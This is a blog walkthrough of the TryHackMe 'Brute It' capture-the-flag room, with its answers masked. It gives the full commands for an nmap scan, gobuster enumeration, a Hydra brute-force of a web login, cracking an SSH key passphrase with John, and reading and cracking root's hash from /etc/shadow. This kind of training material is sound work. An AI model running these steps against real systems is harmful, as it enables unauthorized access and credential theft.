Try Hack Me: Brute It

This room is super easy and it is perfect for beginners who want to try pentesting/hacking.

The skills/tools to be tested and needed to solve this room are: NMAP, Fuzzing/Enumeration, SSH, Brute Forcing, Hash Cracking, and Privilege Escalation.

This room was released on 11/06/2020 and it is rated easy in difficulty. Shout-out to the room creator, @reddyyz. You can access the room at https://tryhackme.com/room/bruteit.

I was assigned a target IP address of 10.10.184.109. You will be assigned a different IP address, so double check your entries when following this walk-through.

The requirements to complete this room are:

• How many ports are open?
  • *
• What version of SSH is running?
  • O****** *.**1
• What version of Apache is running?
  • 2.*.**
• Which Linux distribution is running?
  • U*****
• What is the hidden directory?
  • /*****
• What is the user:password of the admin panel?
  • a****:x*****
• What is John’s RSA private key passphrase?
  • r*********
• User.txt
  • THM{a*************************r}
• Web flag
  • THM{b*****************y}
• What is root’s password?
  • f*******
• Root.txt
  • THM{p******************n}

Steps:

1. Scan the target using nmap. Type nmap -sC -sV -oA nmap/startup 10.10.184.109

• -sC – to scan using the default nmap scripts
• -sV – to pull version information of open ports found during the scan
• -oA – to save the results of the scan to a files named startup and saved in three different formats (normal, XML, and grepable)

• We found answers to the following:
• How many ports are open?
  • *
• What version of SSH is running?
  • O****** *.**1
• What version of Apache is running?
  • 2.*.**
• Which Linux distribution is running?
  • U*****

2. Web service is open with port 80, so let’s check by opening a web browser and type the IP address in the url bar. Type 10.10.184.109

***There is nothing in the page source, so let’s go ahead and enumerate the web service

3. Enumerate the web service using gobuster. Type gobuster dir -u 10.10.184.109 -w /usr/share/wordlists/dirb/common.txt | tee gobuster

• dir – to use directory/file brute-forcing mode
• -u – is the flag to tell gobuster that we are scanning a URL
• -w – is the flag to set the list of possible directory and file names
• -tee – is to direct the result as an output

• We found the answer to what is the hidden directory?
  • /*****

4. Visit the hidden directory found above by opening a web browser and type 10.10.184.109/*****

5. Check the page source code by right-clicking a blank part of the webpage and choose View Page Source

***We can see a cleartext password that we can use to login to the admin portal

6. Now that we have a username, we have to bruteforce the password by using Hydra. But first we have to use Burpsuite to capture the our client’s HTTP request and the server’s response. Open Burpsuite and try to login to the portal so Burpsuite will capture the interaction. And see the information we need to setup Hydra

7. Use Hydra to brute force the password. Type hydra -l ***** -P /usr/share/wordlists/rockyou.txt 10.10.184.109 http-post-form “/*****/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid”

• -l – use the lowercase letter L if you have a username
• -P – use the uppercase letter P if you dont’ have a password and you are using a list
• http-post-form – is to declare that the page is using a POST request
• ^USER^ – this is where hydra enters the username to login
• ^PASS^ – this is where hydra enters the password to login
• F – is the error message when the login fails so Hydra knows to try a different credentials

• We found the answer to what is the user:password of the admin panel?
  • a****:x*****

8. Login to the admin panel

• We found the answer to web flag
  • THM{b*****************y}

9. Click the link to view John’s RSA private key. Then copy and paste it and save it on your attack machine

10. Let’s convert this private key into a hashed form so John the Ripper will be able to unhash the passphrase by using ssh2john. To convert to hashed form, type python /usr/share/john/ssh2john.py john_rsa > brute.txt

11. Let’s crack the hash by using John again. Type /usr/sbin/john –wordlist=/usr/share/wordlists/rockyou.txt brute.txt

• We found the answer to what is John’s RSA private key passphrase?
  • r*********

12. SSH to the server by using the passphrase we found above. Type ssh -i john_rsa john@10.10.184.109 and then type the passphrase we found in step 11

13. Look for the user.txt by typing find / -type f -name user.txt 2> /dev/null and then use cat to read the file user.txt

• We found the answer to user.txt
  • THM{a*************************r}

14. To check if our current user has any sudo privileges, type sudo -l

15. To read the root.txt, type sudo cat /root/root.txt

• We found the answer to root.txt
  • THM{p******************n}

16. Since we have root privilege to the cat command, let’s check the /etc/shadow file and see if we can get the hashed password of the user root. Type sudo cat /etc/shadow

17. Copy the entire line from “root” all the way to the “:::” and paste it to a txt file in your attack machine. Crack the root’s hashed password using John. Type john rootpw.txt

Hope you had fun with this room and write-up Pleas subscribe to my blog to get notified when I upload new contents.

Happy hacking!